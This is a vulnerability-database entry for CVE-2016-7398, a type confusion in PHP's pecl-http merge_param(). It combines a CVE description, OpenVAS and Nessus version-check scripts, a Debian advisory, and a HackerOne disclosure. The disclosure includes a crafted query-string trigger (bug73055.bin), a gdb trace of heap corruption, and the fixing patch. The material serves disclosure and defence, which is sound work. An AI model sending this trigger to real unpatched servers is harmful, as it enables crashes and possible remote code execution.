ID CVE-2016-7398 Type cve Reporter cve@mitre.org Modified 2019-09-20T21:15:00
Description
A type confusion vulnerability in the merge_param() function of php_http_params.c in PHP's pecl-http extension 3.1.0beta2 (PHP 7) and earlier as well as 2.6.0beta2 (PHP 5) and earlier allows attackers to crash PHP and possibly execute arbitrary code via crafted HTTP requests.
{"openvas": [{"lastseen": "2020-01-29T19:25:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7398"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-09-21T00:00:00", "id": "OPENVAS:1361412562310891929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891929", "type": "openvas", "title": "Debian LTS: Security Advisory for php-pecl-http (DLA-1929-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891929\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-7398\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-21 02:00:24 +0000 (Sat, 21 Sep 2019)\");\n script_name(\"Debian LTS: Security Advisory for php-pecl-http (DLA-1929-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/09/msg00022.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1929-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-pecl-http'\n package(s) announced via the DLA-1929-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and possibly\nexecute arbitrary code via crafted HTTP requests.\");\n\n script_tag(name:\"affected\", value:\"'php-pecl-http' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pecl-http\", ver:\"2.0.4-1+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pecl-http-dev\", ver:\"2.0.4-1+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T01:05:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7398"], "description": "Package : php-pecl-http\nVersion : 2.0.4-1+deb8u1\nCVE ID : CVE-2016-7398\n\n\nA vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and possibly\nexecute arbitrary code via crafted HTTP requests.\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 11, "modified": "2019-09-20T19:08:13", "published": "2019-09-20T19:08:13", "id": "DEBIAN:DLA-1929-1:430B5", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201909/msg00022.html", "title": "[SECURITY] [DLA 1929-1] php-pecl-http security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:41:27", "description": "A vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and\npossibly execute arbitrary code via crafted HTTP requests.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-23T00:00:00", "title": "Debian DLA-1929-1 : php-pecl-http security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7398"], "modified": "2019-09-23T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5-pecl-http", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:php5-pecl-http-dev"], "id": "DEBIAN_DLA-1929.NASL", "href": "https://www.tenable.com/plugins/nessus/129106", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1929-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129106);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7398\");\n\n script_name(english:\"Debian DLA-1929-1 : php-pecl-http security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and\npossibly execute arbitrary code via crafted HTTP requests.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/09/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php-pecl-http\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected php5-pecl-http, and php5-pecl-http-dev packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pecl-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pecl-http-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"php5-pecl-http\", reference:\"2.0.4-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pecl-http-dev\", reference:\"2.0.4-1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:08", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2016-7398"], "description": "Since the original report is still marked as private in the PHP bug tracker please find the copy & pasted bug report below (edited for readability and to include correct bug tracker id). See the references section for a link to the issue in the PHP bug tracker!\n\nThe maintainer already fixed the issue in the public git repo using the proposed patch included in the original report.\n\nMitre assigned **CVE-2016-7398** for this issue.\n\n# Description\n\nThe url parsing functions of the PECL HTTP extension allow overflowing\na heap-based buffer with data originating from an arbitrary HTTP request.\nAffected is the `merge_param()` function in `php_http_params.c` that is called\nfrom `php_http_querystring_parse()`: \n\nCode fragment from `merge_param()` in `php_http_params.c:491`:\n\n```c\nstatic void merge_param(HashTable *params, zval *zdata, ...)\n{\n/*[...]*/\n while (Z_TYPE_P(zdata_ptr) == IS_ARRAY && (test_ptr = zend_hash_get_current_data(Z_ARRVAL_P(zdata_ptr)))) {\n if (Z_TYPE_P(test_ptr) == IS_ARRAY) {\n zval *tmp_ptr = ptr;\n \n/*[...]*/ \n } else {\n if ((ptr = zend_hash_index_find(Z_ARRVAL_P(ptr), hkey.h))) {\n zdata_ptr = test_ptr;\n } else if (hkey.h) {\n ptr = tmp_ptr;\n Z_TRY_ADDREF_P(test_ptr);\n/*[511]*/ ptr = zend_hash_index_update(Z_ARRVAL_P(ptr), hkey.h, test_ptr);\n/*[...]*/\n```\n\nIn line 511 `zend_hash_index_update()` is called with ptr used as an array\n(`Z_ARRVAL_P(ptr)`) without actually checking its type. Thus it was possible\nto call `zend_hash_index_update()` on a `zend_string` instead which obviously\nleads to memory corruption issues.\n\nThe sample request provided in this report uses this type confusion\nvulnerability to trigger an arbitrary heap overwrite. The actual overwrite\noccurs in `_zend_hash_index_add_or_update_i()`: \n\n```c\nstatic zend_always_inline zval *_zend_hash_index_add_or_update_i(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)\n{\n/*[...]*/\nadd_to_hash:\n/*[...]*/\n p = ht->arData + idx;\n p->h = h;\t\t\t\t\t\t// <- heap overflow\n p->key = NULL;\t\t\t\t\t// <- heap overflow\n/*[...]*/\n```\n\nBecause of the invalid pointer provided as HashTable `ht->arData` points\nto an unexpected memory location on the heap and not to the list of Buckets\nof an ordinary `HashTable`. So the two following assignments allow to write\narbitrary values (`hkey.h` and `NULL`) on the heap.\nAs it turned out `hkey.h` can be controlled with request data received from\nthe network. \nThe attached proof of concept demonstrates that this flaw very likely allows\nfor remote code execution.\n\nThis vulnerability was found using `afl-fuzz`/`afl-utils`.\n\n# PoC\n\nSee the attached patch for the sample request in `bug73055.bin`.\n\n```\n$ cat http_querystring.php\n/*\n * http_querystring.php\n */\n<?php\n $qs = new http\\QueryString(file_get_contents(\"bug73055.bin\"));\n?>\n$ ./configure --enable-raphf --enable-propro --with-http && make\n$ gdb ./sapi/cli/php\ngdb> b php_http_params.c:511\ngdb> r http_querystring.php\n Breakpoint 1, merge_param (zdata=0x7fffffff9cf0, current_args=0x7fffffff9dd8, current_param=0x7fffffff9de0,\n params=<optimized out>) at php_http_params.c:511\n 511\t\t\t\tptr = zend_hash_index_update(Z_ARRVAL_P(ptr), hkey.h, test_ptr);\ngdb> p ptr.u1.type_info\n $1 = 6 // <-- IS_STRING, incorrect type!\ngdb> b zend_hash.c:811\ngdb> c\n Breakpoint 2, _zend_hash_index_add_or_update_i (flag=1, pData=0x7ffff425c6a0, h=16706, ht=0xf53dc0) at\n zend_hash.c:811\n 811\t\tp->h = h;\t\t\t\t\t\t// <- heap overflow\ngdb> p &p->h\n $2 = (zend_ulong *) 0x1091f40\ngdb> x/8gx 0x1091f20 // heap before overflow\n 0x1091f20:\t0x000000006c72755c\t0x0000000000000021\n 0x1091f30:\t0x00007ffff5addb48\t0x0000000001092960\n 0x1091f40:\t0x0000000000000020\t0x0000000000000031 <-- heap meta-data (prev-size, size)\n 0x1091f50:\t0x0000070600000001\t0x800000017c9c614a\ngdb> ni 2\ngdb> x/8gx 0x1091f20 // heap after overflow\n 0x1091f20:\t0x000000006c72755c\t0x0000000000000021\n 0x1091f30:\t0x00007ffff5addb48\t0x0000000001092960\n 0x1091f40:\t0x0000000000004142\t0x0000000000000000 <-- heap meta-data overwritten*\n 0x1091f50:\t0x0000070600000001\t0x800000017c9c614a\n /*\n * (*) 0x4142 originates from bug73055.bin offset 0x59\n * The numeric string '16706' is converted into the integer\n * it is representing 0x4142 (see sanitize_dimension()).\n */\ngdb> bt // for the record\n #0 _zend_hash_index_add_or_update_i (flag=1, pData=0x7ffff425c6a0, h=16706, ht=0xf53dc0) at zend_hash.c:815\n #1 _zend_hash_index_update (ht=0xf53dc0, h=16706, pData=pData@entry=0x7ffff425c6a0) at zend_hash.c:838\n #2 0x00000000006b032b in merge_param (zdata=0x7fffffff9cf0, current_args=0x7fffffff9dd8, current_param=0x7fffffff9de0, params=<optimized out>) at php_http_params.c:511\n #3 push_param (params=<optimized out>, state=<optimized out>, opts=<optimized out>) at php_http_params.c:607\n #4 0x00000000006b2475 in php_http_params_parse (params=params@entry=0x7ffff42023f0, opts=opts@entry=0x7fffffff9e80) at php_http_params.c:755\n #5 0x00000000006b5479 in php_http_querystring_parse (ht=0x7ffff42023f0, str=str@entry=0x7ffff4282018 '[' <repeats 27 times>, \"]]]]\", '[' <repeats 38 times>, \"&%C0[]E[=&2[&%C0[]E[16706[*[\", len=<optimized out>) at php_http_querystring.c:224\n #6 0x00000000006b552c in php_http_querystring_update (qarray=qarray@entry=0x7fffffff9f80, params=params@entry=0x7ffff4213130, outstring=outstring@entry=0x0) at php_http_querystring.c:268\n #7 0x00000000006b6029 in php_http_querystring_set (flags=0, params=0x7ffff4213130, instance=0x7ffff4213100) at php_http_querystring.c:49\n #8 zim_HttpQueryString___construct (execute_data=<optimized out>, return_value=<optimized out>) at php_http_querystring.c:365\n #9 0x00000000007b0a93 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER () at zend_vm_execute.h:970\n [...]\ngdb> dis 1 2\ngdb> c\n Fatal error: Uncaught http\\Exception\\BadQueryStringException: http\\QueryString::__construct(): Max input nesting level of 64 exceeded in http_querystr.php:5\n Stack trace:\n #0 http_querystr.php(5): http\\QueryString->__construct('[[[[[[[[[[[[[[[...')\n #1 {main}\n \n Next \u0001\n thrown in http_querystr.php on line 5\n *** Error in `sapi/cli/php': free(): invalid pointer: 0x0000000001091f50 ***\n Program received signal SIGABRT, Aborted.\n 0x00007ffff577804f in raise () from /usr/lib/libc.so.6\n```\n\n# Patch\n\nAfter careful review by the project maintainers the following patch may be used\nto fix the reported issue. \n\n From 34ae784c44be4a60157947f8ccc8c918e9b6ba40 Mon Sep 17 00:00:00 2001\n From: rc0r <hlt99@blinkenshell.org>\n Date: Fri, 9 Sep 2016 11:31:57 +0200\n Subject: [PATCH] Type confusion vulnerability in merge_param() (#73055) fixed\n \n ---\n src/php_http_params.c | 2 +-\n tests/bug73055.phpt | 25 +++++++++++++++++++++++++\n tests/data/bug73055.bin | 1 +\n 3 files changed, 27 insertions(+), 1 deletion(-)\n create mode 100644 tests/bug73055.phpt\n create mode 100644 tests/data/bug73055.bin\n \n diff --git a/src/php_http_params.c b/src/php_http_params.c\n index 8988f43..0846f47 100644\n --- a/src/php_http_params.c\n +++ b/src/php_http_params.c\n @@ -489,7 +489,7 @@ static void merge_param(HashTable *params, zval *zdata, zval **current_param, zv\n zval *test_ptr;\n \n while (Z_TYPE_P(zdata_ptr) == IS_ARRAY && (test_ptr = zend_hash_get_current_data(Z_ARRVAL_P(zdata_ptr)))) {\n -\t\t\t\tif (Z_TYPE_P(test_ptr) == IS_ARRAY) {\n +\t\t\t\tif ((Z_TYPE_P(test_ptr) == IS_ARRAY) && (Z_TYPE_P(ptr) == IS_ARRAY)) {\n zval *tmp_ptr = ptr;\n \n /* now find key in ptr */\n diff --git a/tests/bug73055.phpt b/tests/bug73055.phpt\n new file mode 100644\n index 0000000..260e823\n --- /dev/null\n +++ b/tests/bug73055.phpt\n @@ -0,0 +1,25 @@\n +--TEST--\n +Type confusion vulnerability in merge_param()\n +--SKIPIF--\n +<?php\n +include \"skipif.inc\";\n +?>\n +--FILE--\n +<?php\n +\n +echo \"Test\\n\";\n +try {\n +\techo new http\\QueryString(file_get_contents(__DIR__.\"/data/bug73055.bin\")); // <- put provided sample into correct location\n +} catch (Exception $e) {\n +\techo $e;\n +}\n +?>\n +\n +===DONE===\n +--EXPECTF--\n +Test\n +%r(exception ')?%rhttp\\Exception\\BadQueryStringException%r(' with message '|: )%rhttp\\QueryString::__construct(): Max input nesting level of 64 exceeded in %sbug73055.php:5\n +Stack trace:\n +#0 %sbug73055.php(5): http\\QueryString->__construct('[[[[[[[[[[[[[[[...')\n +#1 {main}\n +===DONE===\n \\ No newline at end of file\n diff --git a/tests/data/bug73055.bin b/tests/data/bug73055.bin\n new file mode 100644\n index 0000000..ad2dd9f\n --- /dev/null\n +++ b/tests/data/bug73055.bin\n @@ -0,0 +1 @@\n +[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]][[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[&%C0[]E[=&2[&%C0[]E[16706[*[\n \\ No newline at end of file\n -- \n 2.9.3\n\n# Versions known to be affected\n\npecl-http extension versions up to and including:\n\n* 3.1.0beta2 (PHP 7)\n* 2.6.0beta2 (PHP 5)\n\n\n# Timeline\n\n2016-09-09 Initial report to PHP bug tracker (#73055)\n2016-09-12 Issue fixed in git repository, CVE requested\n2016-09-13 Mitre assigned CVE-2016-7398\n\n\n# References\n\nhttps://bugs.php.net/bug.php?id=73055\nhttps://github.com/m6w6/ext-http/commit/17137d4ab1ce81a2cee0fae842340a344ef3da83\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7398\n", "modified": "2017-05-30T15:13:53", "published": "2016-09-27T14:03:13", "id": "H1:172411", "href": "https://hackerone.com/reports/172411", "type": "hackerone", "title": "PHP (IBB): Heap overflow caused by type confusion vulnerability in merge_param()", "cvss": {"score": 0.0, "vector": "NONE"}}]}
